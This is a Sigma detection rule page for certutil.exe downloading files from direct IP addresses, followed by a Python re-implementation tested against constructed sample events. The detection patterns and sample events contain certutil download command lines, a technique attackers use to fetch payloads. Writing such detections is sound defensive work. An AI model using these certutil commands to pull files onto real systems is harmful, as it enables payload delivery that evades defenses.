Suspicious File Downloaded From Direct IP Via Certutil.EXE
Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
Sigma rule
```yaml
title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
id: 13e6fe51-d478-4c7e-b0f2-6da9b400d829
related:
  - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download
    type: similar
  - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download
    type: similar
status: test
description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
references:
  - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
  - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
  - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
  - https://twitter.com/egre55/status/1087685529016193025
  - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
  - https://twitter.com/_JohnHammond/status/1708910264261980634
  - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-15
modified: 2025-12-01
tags:
  - attack.defense-evasion
  - attack.t1027
  - attack.command-and-control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Image|endswith: '\certutil.exe'
    - OriginalFileName: 'CertUtil.exe'
  selection_flags:
    CommandLine|contains:
      - 'urlcache '
      - 'verifyctl '
      - 'URL '
  selection_http:
    CommandLine|contains:
      - '://1'
      - '://2'
      - '://3'
      - '://4'
      - '://5'
      - '://6'
      - '://7'
      - '://8'
      - '://9'
  # filter_local_ips:
  #   # Note: Uncomment this filter if you want to exclude local IPs
  #   CommandLine|contains:
  #     - '://10.'      # 10.0.0.0/8
  #     - '://192.168.' # 192.168.0.0/16
  #     - '://172.16.'  # 172.16.0.0/12
  #     - '://172.17.'
  #     - '://172.18.'
  #     - '://172.19.'
  #     - '://172.20.'
  #     - '://172.21.'
  #     - '://172.22.'
  #     - '://172.23.'
  #     - '://172.24.'
  #     - '://172.25.'
  #     - '://172.26.'
  #     - '://172.27.'
  #     - '://172.28.'
  #     - '://172.29.'
  #     - '://172.30.'
  #     - '://172.31.'
  #     - '://127.'     # 127.0.0.0/8
  #     - '://169.254.' # 169.254.0.0/16
  filter_main_seven_zip:
    CommandLine|contains: '://7-' # For https://7-zip.org/
  condition: all of selection_* and not 1 of filter_main_*
falsepositives:
  - Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml
```
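The rule's matching logic, re-implemented in Python over a few constructed process_creation events so the selections and the 7-Zip filter can be checked offline. This is an added example, not part of the Sigma rule or the regression data; the events, field names and the optional `exclude_local_ips` switch are assumptions. It also shows why the `://7-` filter exists: `selection_http` keys on `://` followed by a digit, so a hostname such as 7-zip.org trips it too. Note that the commented-out `filter_local_ips` is not named `filter_main_*`, so uncommenting it alone would not change the rule's `condition`; here it is applied explicitly.

```python
# Sigma "contains" and "endswith" modifiers are case-insensitive by default.
SELECTION_FLAGS = ("urlcache ", "verifyctl ", "URL ")
SELECTION_HTTP = tuple(f"://{d}" for d in "123456789")
FILTER_SEVEN_ZIP = ("://7-",)  # https://7-zip.org/ starts with a digit
# Private, loopback and link-local prefixes from the rule's commented-out filter.
FILTER_LOCAL_IPS = ("://10.", "://192.168.", "://127.", "://169.254.") + tuple(
    f"://172.{n}." for n in range(16, 32))

# Constructed sample events (not real telemetry); 203.0.113.0/24 is documentation space.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.10/update.txt update.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -f https://7-zip.org/a/7z.exe 7z.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -f http://192.168.1.5/tool.zip tool.zip"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -f http://example.com/file.txt file.txt"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd /c echo http://1.2.3.4/"},
]

def _contains_any(value, needles):
    """Case-insensitive equivalent of Sigma's CommandLine|contains with a list."""
    v = value.lower()
    return any(n.lower() in v for n in needles)

def rule_matches(event, exclude_local_ips=False):
    """True when the event satisfies: all of selection_* and not 1 of filter_main_*."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    selection_img = image.endswith("\\certutil.exe") or original == "certutil.exe"
    selection_flags = _contains_any(cmd, SELECTION_FLAGS)
    selection_http = _contains_any(cmd, SELECTION_HTTP)
    filtered = _contains_any(cmd, FILTER_SEVEN_ZIP)
    if exclude_local_ips:  # assumed switch standing in for the commented-out filter
        filtered = filtered or _contains_any(cmd, FILTER_LOCAL_IPS)
    return selection_img and selection_flags and selection_http and not filtered

def alerting_command_lines(events, exclude_local_ips=False):
    """Return the command lines of all events the rule would alert on."""
    return [e["CommandLine"] for e in events if rule_matches(e, exclude_local_ips)]

if __name__ == "__main__":
    for line in alerting_command_lines(SAMPLE_EVENTS):
        print("ALERT:", line)
```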
Related rules
- Suspicious Download Via Certutil.EXE
- Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
- Password Protected ZIP File Opened (Suspicious Filenames)
- File Download with Headless Browser
- ArcSOC.exe Creating Suspicious Files